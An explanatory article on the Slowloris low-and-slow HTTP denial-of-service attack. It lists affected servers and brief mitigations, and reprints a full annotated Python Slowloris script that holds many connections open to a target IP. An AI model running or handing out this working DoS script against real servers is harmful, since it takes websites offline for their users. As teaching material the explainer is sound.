Slow Loris DoS Attack
Description
Slow Loris was invented by Robert Hansen “RSnake” and got published in June 2009. This Denial of service (DoS) Attack belongs of the category of Low and Slow Attacks. This type of DoS attack doesn't need a tremendous amount of computing power or bandwidth to make a big impact. Furthermore, it is possible to take down a small website with the use of only PC that doesn’t even runs under full load during the attack.
The attack works only at a portion of Web server programs like Apache because it attacks a specific design decision of the connection management. Apache is designed to allow only a predefined number of connections, which can be edited in the configuration file. The sow loris is abusing this vulnerability by opening a huge amount of connections and keeps them alive during the attack. This fills up the available connections of the web server and restricts a legitimate user to access the web server.
The Slow Loris attack is keeping all its connections alive by exploiting another inconvenience of the http protocol. Http is designed to keep connections alive until the whole the whole Request is sent or there the client didn't any data for a period of time and a timer exceeds. This design decision is needed for extremely slow connections, which were quite common in 1991 when HTTP came out. Slow Loris is abusing this feature by never ending the and sending little header packets of a handful bytes.
The figure shows one http connection of the original implementation. It starts by sending the Get request line followed by the User agent information and the accepted language. Then the exploit takes place by sending a random number to the X-a HTTP header field every fifteen seconds without closing the request. HTTP allows custom header fields which always start with “X-”.
Affected Webservers
RSnake stated in the documentation [1] that the following web servers were affected by the time the he published the source code:
- Apache 1.x
- Apache 2.x
- dhttpd
- GoAhead WebServer
He also stated that that following web servers were not affected due to a different connection management design:
- IIS6.0
- IIS7.0
- lighttpd
- Squid
- nginx
- Cherokee (verified by user community)
- Netscaler
- Cisco CSS (verified by user community)
Mitigating the Slow Loris Attack
The slow loris attack is really hard to detect because the connections are used the legitimate way, but there are some ways to mitigate the attack:
- Increase the server availability
Increasing the allowed connections can help against a little attacker but it comes a financial effort. A little web page like a Blog would make more financial loss by spending extra money for server resources than being offline for a day.
- Restrict the connections of one user
Restricting the number of connections that one user can be easily avoided by spoofing a random IP address for every connection. Furthermore, attacks on big websites come from botnets with thousands of different devices and IP addresses.
- Using reverse proxies, firewalls or load balancers
Examine the Source code of slowloris.py
The following source code is a copy of the Attack programmed for Python by the github user gkbrk. The repo of the source code can be found here.
The connection works really similar to the original implementation by starting to send a get request at line 35. The format function exchanges the {} characters with the value in the round brackets of the function.
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
In line 37 it sends the User-agent information and the Accepted language. The exploit takes place at line 43 by sending a random value to the X-a header.
1 | import socket --------------------------------------------------------------------------------------|
2 | import random | Library Imports
3 | import time |
4 | import sys -----------------------------------------------------------------------------------------|
5 |
6 | log_level = 2 --------------------------------------------------------------------------------------|
7 | |
8 | def log(text, level=1): | Defining the Log Function
9 | if log_level >= level: |
10| print(text) --------------------------------------------------------------------------------|
11|
12| list_of_sockets = [] ------------------------------------------------------------------------------- Creating a Socket list
13|
14| regular_headers = [ --------------------------------------------------------------------------------|
15| "User-agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0", | Defining HTTP header values
16| "Accept-language: en-US,en,q=0.5"] -------------------------------------------------------------|
17|
18| ip = sys.argv[1] ------------------------------------------------------------------------------------|
19| socket_count = 100 | Defining the IP address and
20| log("Attacking {} with {} sockets.".format(ip, socket_count)) --------------------------------------| the amount of connections
21|
22| log("Creating sockets...") -------------------------------------------------------------------------|
23| for _ in range(socket_count): | Creating Sockets and adding
24| try: | them to the Socket list
25| log("Creating socket nr {}".format(_), level=2) |
26| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
27| s.settimeout(4) |
28| s.connect((ip, 80)) |
29| except socket.error: |
30| break |
31| list_of_sockets.append(s) ----------------------------------------------------------------------|
32|
33| log("Setting up the sockets...") ------------------------------------------------------------------|
34| for s in list_of_sockets: |
35| s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) | Sending the initial
36| for header in regular_headers: | Header fields
37| s.send(bytes("{}\r\n".format(header).encode("utf-8"))) -------------------------------------|
38|
39| while True: ---------------------------------------------------------------------------------------|
40| log("Sending keep-alive headers...") | Sending every 15 seconds
41| for s in list_of_sockets: | a random value to the X-a
42| try: | header filed.
43| s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8")) | Also checking if the
44| except socket.error: | socket got disconnected
45| list_of_sockets.remove(s) | and create a new one if
46| try: | it is the case
47| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
48| s.settimeout(4) |
49| s.connect((ip, 80)) |
50| for s in list_of_sockets: |
51| s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) |
52| for header in regular_headers: |
53| s.send(bytes("{}\r\n".format(header).encode("utf-8"))) |
54| except socket.error: |
55| continue |
56| |
57| time.sleep(15) --------------------------------------------------------------------------------|
References
[1] https://web.archive.org/web/20150426090206/http://ha.ckers.org/slowloris
[2] https://en.m.wikipedia.org/wiki/Slowloris_(computer_security)
[3] https://gist.github.com/gkbrk/5de70f35e69343718431#file-slowloris-py
[4] https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/
